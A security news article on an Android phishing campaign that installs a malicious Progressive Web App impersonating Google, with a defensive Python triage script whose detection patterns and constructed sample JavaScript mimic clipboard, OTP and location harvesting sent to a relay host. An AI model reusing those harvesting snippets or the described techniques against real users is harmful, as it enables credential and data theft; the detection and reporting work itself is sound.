Attackers are abusing Progressive Web Apps (PWAs) on Android

Victims lured via phishing site google-prism[dot]com into installing malicious PWA

PWA harvests clipboard, crypto wallets, OTPs, GPS, and more

Threat actors have begun turning to Progressive Web Apps (PWA) to do their evil bidding on Android, stealing login credentials, cryptocurrency wallet data, GPS information, and more, experts have warned.

Security researchers from Malwarebytes recently detailed one such campaign they spotted in the wild. It starts with a phishing email that lures people to a fake Google site, google-prism[dot]com.

Under the pretense of enhanced security, the victims are walked through a four-step “security” check that includes installing a malicious PWA.

Harvesting the data

For those unaware of PWAs, these are websites that can be installed and launched like regular apps on the device, but which still run inside the web browser and are limited to the permissions the browser grants them.

Once installed, the PWA asks for permissions to send notifications, access clipboard data, and other browser features, and sets up a service worker to enable push notifications, background tasks, and data staging.

At this point, the malware starts collecting data whenever the app is open. Clipboard contents, cryptocurrency wallet addresses, one-time passwords via the WebOTP API, contacts, GPS data, and device fingerprinting details are all harvested. Since the information can only be gathered while the app is open, the PWA also starts sending push notifications to the victim, nudging them to reopen it.

The PWA also establishes a WebSocket-based relay and HTTP proxy capability, so that the attackers can route web requests through the victim's device, scan internal networks, and even access local resources.
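The capabilities described above are all ordinary, documented browser APIs; what makes this PWA malicious is the combination of them in one installable app that impersonates a brand. The following static triage script, an added example that is not Malwarebytes' tooling or anything from the campaign, scores a PWA's manifest and JavaScript on exactly that combination: a standalone manifest whose name claims a brand its origin does not belong to, a service worker with a push handler, and page scripts that touch the clipboard, WebOTP, geolocation and a WebSocket relay. The `BRAND_HOSTS` allow-list, the weights and thresholds, and every sample input (manifest, service worker, app script, the `google-prism.invalid` origin) are constructed assumptions, not data from the article.

```python
"""Static triage of a PWA's manifest and JavaScript for the capability
combination described in the article. Added example, not Malwarebytes'
tooling; every sample input below is constructed."""
import json
import re
from urllib.parse import urljoin, urlparse

# Documented browser APIs the campaign above chains together. Each is benign
# on its own; the triage score grows with the number that co-occur.
CAPABILITY_PATTERNS = {
    "clipboard_read": r"navigator\.clipboard\.readText\s*\(",
    "webotp": r"navigator\.credentials\.get\s*\(\s*\{[^}]*\botp\b",
    "geolocation": r"navigator\.geolocation\.(?:getCurrentPosition|watchPosition)\s*\(",
    "push_handler": r"addEventListener\s*\(\s*['\"]push['\"]",
    "websocket": r"new\s+WebSocket\s*\(",
    "contacts": r"navigator\.contacts\.select\s*\(",
    "fingerprint": r"navigator\.(?:hardwareConcurrency|deviceMemory|userAgentData)\b",
}

# Hypothetical allow-list: hosts on which a manifest naming this brand is expected.
BRAND_HOSTS = {"google": ("google.com",)}


def scan_javascript(source):
    """Return the set of capability labels whose pattern occurs in the source."""
    return {label for label, pattern in CAPABILITY_PATTERNS.items()
            if re.search(pattern, source)}


def scan_manifest(manifest_json, origin):
    """Return manifest findings; origin is the URL the manifest was fetched from,
    used to resolve a relative start_url."""
    manifest = json.loads(manifest_json)
    findings = []
    if manifest.get("display") in ("standalone", "fullscreen"):
        findings.append("installs_standalone")  # no browser chrome once installed
    name = (manifest.get("name", "") + " " + manifest.get("short_name", "")).lower()
    host = urlparse(urljoin(origin, manifest.get("start_url", "/"))).hostname or ""
    for brand, hosts in BRAND_HOSTS.items():
        on_brand_host = any(host == h or host.endswith("." + h) for h in hosts)
        if brand in name and not on_brand_host:
            findings.append("brand_mismatch:%s:%s" % (brand, host))
    return findings


def triage(manifest_json, origin, *scripts):
    """Combine manifest findings and script capabilities into a score and verdict."""
    capabilities = set()
    for script in scripts:
        capabilities |= scan_javascript(script)
    findings = scan_manifest(manifest_json, origin)
    # Weights are a judgement call: brand impersonation outweighs any single API.
    score = len(capabilities) + sum(3 if f.startswith("brand_mismatch") else 1
                                    for f in findings)
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"capabilities": sorted(capabilities), "manifest": findings,
            "score": score, "verdict": verdict}


# Constructed inputs modelled on the article's description (not real samples).
SAMPLE_ORIGIN = "https://google-prism.invalid/"
SAMPLE_MANIFEST = json.dumps({
    "name": "Google Security Check", "short_name": "Security Check",
    "start_url": "/check/", "display": "standalone",
})
SAMPLE_SERVICE_WORKER = """
self.addEventListener('push', function (e) {
  self.registration.showNotification(e.data.text());
});
"""
SAMPLE_APP_SCRIPT = """
navigator.clipboard.readText().then(function (t) { queue.push(t); });
navigator.credentials.get({ otp: { transport: ['sms'] } }).then(function (c) { queue.push(c.code); });
navigator.geolocation.getCurrentPosition(function (p) { queue.push(p.coords); });
var relay = new WebSocket('wss://google-prism.invalid/relay');
"""

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_ORIGIN,
                            SAMPLE_SERVICE_WORKER, SAMPLE_APP_SCRIPT), indent=2))
```

Run against the constructed sample the script reports five co-occurring capabilities plus a brand mismatch and rates it "high"; a standalone note-taking app that only registers a push handler on its own domain scores "low". The point of scoring the combination rather than any single API is that clipboard reads, WebOTP and push are all legitimate features of real PWAs, so a rule on one of them alone would drown in false positives.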

In some cases, Malwarebytes said, the victim is also encouraged to download a “companion app” advertised as a “critical security update” which requests extensive permissions and registers as a device administrator.

This app, obviously for the more gullible ones, enables deeper compromise, including SMS interception, keystroke capture via a custom keyboard, notification monitoring, credential theft, and long-term persistence.

If, by any chance, you’ve installed such an app, you can remove it by looking for a “Security Check” entry in the list of installed apps. If your device also has an app called “System Service” with the package name com.device.sync, and it has admin access, first revoke that access by going to Settings - Security - Device admin apps, and then uninstall it.

